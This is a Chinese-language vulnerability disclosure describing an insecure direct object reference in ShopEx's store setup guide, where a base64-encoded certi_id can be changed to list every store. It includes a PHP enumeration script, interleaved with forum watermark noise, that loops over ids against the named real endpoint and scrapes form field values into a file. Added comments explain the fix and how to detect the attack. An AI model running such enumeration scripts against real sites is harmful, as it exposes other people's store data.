简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码(base64 只是编码,并非加密)为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
// Proof-of-concept listing from the report, reproduced exactly as extracted: the
// forum's anti-copy watermark text is interleaved with the code on most lines, so
// this block is not valid PHP as shown and must not be read as a runnable program.
//
// What the visible lines demonstrate: step2.php of the guide site is requested with
// a `refer` query parameter that is nothing more than base64 of a JSON document
// carrying a `certi_id`; the loop substitutes sequential ids into that document and
// records whatever form fields come back. base64 is an encoding, not authentication,
// and — per the report — nothing binds certi_id to the requesting user, which is
// the insecure-direct-object-reference (IDOR) the report describes.
//
// Defender notes:
//  - The root-cause fix is server-side: derive certi_id from the authenticated
//    session (or sign the refer document with a server-held key and verify it)
//    instead of trusting a client-supplied id. Swapping the obfuscation scheme for
//    another one does not close the hole.
//  - Detection: thousands of requests to a single endpoint with sequential ids from
//    one client (the 1..9999 loop below) is a classic enumeration signature worth
//    rate limiting and alerting on.
% Q, F$ A# e/ C: ?, H+ O9 }5 x1 B
// Sequential-id driver: certi_id = 1 .. 9999, one request each.
/ u. J6 `2 P, x3 X for ($i=1; $i < 10000; $i++) { // enumerate
9 J+ B; c* z4 v7 h( d ShowshopExD($i);8 i# a! f* Z* |1 v6 i# {) o5 m
2 h. {! a1 r* b$ _; W5 Z }2 z2 D6 X4 Y- W; A
// Fetches the guide page for one certi_id and, when the page echoes the refer
// value back, dumps every <input type="text"> name:value pair to stdout and to
// a local file. $cid: the id to substitute; no return value.
0 |* w# g" [; b! { function ShowshopExD($cid) {; Q& s( z n1 c/ b6 ?
$ g% m7 p! D4 J6 m R
$url='http://guide.ecos.shopex.cn/step2.php';. n/ R5 g0 { e; i0 i+ G0 q' d3 S
. q5 I6 m2 ^$ }5 B1 S* z
// The whole "credential" is this base64 JSON: certi_id is attacker-chosen and the
// callback_url is a fixed placeholder host — there is no signature or nonce.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');1 p) t: L8 u: o* l2 K/ N; l; w3 h$ D
& v7 K6 h+ |3 A( k! p# z8 ?. U $url = $url.'?refer='.$refer;. z9 p( e/ v1 }" s
6 c, a- N) X- v% _+ W9 U $ch = curl_init($url);1 l, J/ N3 F, {: J; Z
- _- C+ [6 q' U
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;0 p! g) ]1 Q! S$ z
% ~( ^+ e4 a6 K5 k. x/ _3 p, ]
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;0 {1 o! w) l) f6 u
// NOTE(review): curl_exec() returns false on a transport failure; the result is
// passed on without a check.
; `9 ?0 Y+ ~* d $result = curl_exec($ch);" x7 T# w' W0 Y* g9 K1 T& c
7 P; U4 G; t% A3 A' ?
// Response body is re-encoded from UTF-8 to GB2312 before any matching.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");( Z, w. W; z- R) D$ C; P
// Truthy strpos() test: a hit at byte offset 0 would read as "not found";
// presumably the refer value is echoed somewhere later in the page.
* y3 E- N. V$ z4 E if(strpos($result,$refer))
8 v, D/ K# ^% c9 O; u! j# V
+ e9 ~* @8 ]( c- @3 U) d7 E {2 N* G1 w$ s Y1 u; S
/ ^1 H" d+ K' _- r- X0 [0 e y, F
// Output file opened in append-binary mode inside the match branch and closed
// after the loop; fopen() failure is not checked.
$fp = fopen("c:/shopEx.txt",'ab'); // save to file
// Collect every <input type="text" ... /> element from the page ...
6 M4 b) k4 |1 s- G" G preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
$ t" e2 H: ] A% l7 d2 S, D4 h |- H( C
foreach ($value[1] as $key) {
+ B8 ]. @" O5 O) \( H6 z$ y7 [6 R. U) D9 f
// ... and pull the first name="..." / value="..." pair out of each one.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
) M8 n) Z% e \9 I# H9 i
, R2 ]5 f+ f% u, D1 G1 h. h echo $res[1][0].':'.$res[3][0]."\r\n";
: {2 x9 N/ c' w1 f9 L5 D
& l6 t4 G/ {6 L5 Z3 v6 Z V2 H $col =$res[1][0].':'.$res[3][0]."\r\n";
" b& p% W+ _/ [; m2 |1 E& M
) Z$ S6 l2 @" ?2 Z fwrite($fp, $col, strlen($col));
& ~2 K9 n: l8 g8 W* k
' z( }* m \$ j) z# `2 {5 N }$ M I9 g: [; B6 V
- ^) Q* u0 L/ A% i7 G! |* |% j echo '--------------------------------'."\r\n";
. w* }7 M! K2 S! y& |; l* W3 d# B- L; d2 r. R W
fclose($fp);
! P1 o0 Q$ ^# w6 \* F) z
4 R) i5 W4 o/ O }
& ?9 M4 c" o( L4 t& Q, {+ o) Q
& ]. O: ^& D" e6 J+ W2 Z% V. r flush();
6 y7 j l+ {* ?
1 _ V7 s+ I; W- x2 d1 H3 {" @* D' k curl_close($ch);+ p, _' _+ m3 z5 N
, }1 a! u3 B% S9 Z1 U }8 F+ r* ]1 B. _, B# o' V4 @. [
) t6 N* l, g( M, l3 ^# c7 Q" T?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式(注:base64 仅是编码而非加密;仅更换编码方式并不能阻止遍历,根本修复应在服务端校验 certi_id 与当前会话的归属关系,或对 refer 做签名并校验)